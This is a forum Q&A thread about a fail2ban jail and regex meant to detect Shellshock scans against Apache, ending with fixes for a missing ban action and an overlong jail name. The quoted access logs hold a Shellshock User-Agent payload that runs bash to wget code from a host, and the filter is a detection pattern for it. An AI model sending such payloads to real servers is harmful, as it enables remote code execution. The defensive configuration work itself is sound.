# fail2ban rules not coming into effect

Tags: security, iptables, fail2ban

I have installed the Apache web server on a stock installation of Ubuntu 14.04, and I am trying to use fail2ban to block requests that check for vulnerabilities.

I have put the following in `/etc/fail2ban/jail.local`:

```
[apache-vulnerability-scan]

enabled  = true
port     = http,https
filter   = apache-vulnerability-scan
logpath  = /var/log/apache*/*access.log
maxretry = 1
```

The definition of the rule is in `/etc/fail2ban/filter.d/apache-vulnerability-scan.conf`:

```
[Definition]

failregex = ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$

ignoreregex =
```

For those who might not be familiar with Ubuntu's fail2ban default rules, some of the primary rules are as shown:

```
ignoreip = 127.0.0.1/8
bantime  = 600
findtime = 600
maxretry = 3
backend = auto
usedns = warn
protocol = tcp
chain = INPUT
```

However, I'm able to make requests without fail2ban banning my IP, even though `maxretry` is set to `1`.

```
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:43 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"
```

The status of the filter seems to be okay:

```
# fail2ban-client status apache-vulnerability-scan
Status for the jail: apache-vulnerability-scan
|- filter
|  |- File list:        /var/log/apache2/other_vhosts_access.log /var/log/apache
2/access.log
|  |- Currently failed: 0
|  `- Total failed:     0
`- action
   |- Currently banned: 0
   |  `- IP list:
   `- Total banned:     0
```

As seems to be the rule itself:

```
Running tests
=============

Use   failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
Use         log file : /var/log/apache2/access.log


Results
=======

Failregex: 10 total
|-  #) [# of hits] regular expression
|   1) [10] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
|      10.0.2.2  Sat Nov 21 00:11:40 2015
|      10.0.2.2  Sat Nov 21 00:11:40 2015
|      10.0.2.2  Sat Nov 21 00:11:40 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:41 2015
|      10.0.2.2  Sat Nov 21 00:11:42 2015
|      10.0.2.2  Sat Nov 21 00:11:42 2015
|      10.0.2.2  Sat Nov 21 00:11:43 2015
`-

Ignoreregex: 0 total

Date template hits:
|- [# of hits] date format
|  [13] Day/MONTH/Year:Hour:Minute:Second
|  [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
|  [0] WEEKDAY MONTH Day Hour:Minute:Second Year
|  [0] WEEKDAY MONTH Day Hour:Minute:Second
|  [0] MONTH Day Hour:Minute:Second
|  [0] Year/Month/Day Hour:Minute:Second
|  [0] Day/Month/Year Hour:Minute:Second
|  [0] Day/Month/Year2 Hour:Minute:Second
|  [0] Month/Day/Year:Hour:Minute:Second
|  [0] Year-Month-Day Hour:Minute:Second[,subsecond]
|  [0] Year-Month-Day Hour:Minute:Second
|  [0] Year.Month.Day Hour:Minute:Second
|  [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
|  [0] Day-Month-Year Hour:Minute:Second
|  [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
|  [0] TAI64N
|  [0] Epoch
|  [0] ISO 8601
|  [0] Hour:Minute:Second
|  [0] <Month/Day/Year@Hour:Minute:Second>
|  [0] YearMonthDay Hour:Minute:Second
|  [0] Month-Day-Year Hour:Minute:Second
`-

Lines: 13 lines, 0 ignored, 12 matched, 1 missed
|- Missed line(s):
|  10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"
`-
```

Why are the fail2ban rules not coming into effect? What am I doing wrong here?

Comment: Is that a typing mistake, that your rule Definition is under `/etc/apache2/filter.d/` ?

Comment: @bangal, yes it indeed is, I'll correct it.

Answer (score 2, accepted):

You are missing an `action` for the used rules, which means fail2ban doesn't know what to do when a rule is matching. This you can configure globally or locally for each jail. The action rules are defined under `/etc/fail2ban/action.d/`

For example, for a global banaction you may add the following in `jail.local`:

`banaction = iptables-multiport`

Please check your `jail.conf` file's "ACTIONS" area for more details.

You will also need to shorten the jail name `apache-vulnerability-scan` as iptables chain name has length limitation.

Comment: After adding the `banaction` line to the `[apache-vulnerability-scan]` section, as well as setting `findtime/bantime=600`, when I run `fail2ban-client status apache-vulnerability-scan`, I see that my IP has been banned, but I am still able to access the webserver. Can you help?

Comment: Please post the output of `iptables -L`.

Comment: have a look at http://pastebin.com/9yj4f2SM

Comment: As you can see, there is no rule in iptables added. Can you change `apache-vulnerability-scan` to something shorter like `apache-v-s` and  try again ?

Comment: Renaming `apache-vulnerability-scan` to something shorter like `vulnscan` did the trick, thanks!